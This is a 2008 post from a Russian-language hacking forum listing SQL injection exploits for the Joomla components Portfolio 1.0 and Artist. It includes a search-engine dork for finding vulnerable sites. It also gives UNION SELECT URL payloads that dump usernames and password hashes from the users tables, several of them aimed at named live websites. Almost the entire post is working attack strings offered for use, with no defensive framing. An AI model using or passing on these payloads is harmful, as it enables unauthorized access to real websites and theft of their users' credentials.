|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Component Portfolio 1.0 SQL Injection
inurl: index.php?option=com_portfolio
Инъекция:
Код:
index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
(с) it's my http://milw0rm.com/exploits/5139
Joomla Component Artist
Код:
http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*
Три разных уязвимых параметра
Последний раз редактировалось it's my; 19.02.2008 в 12:45..
|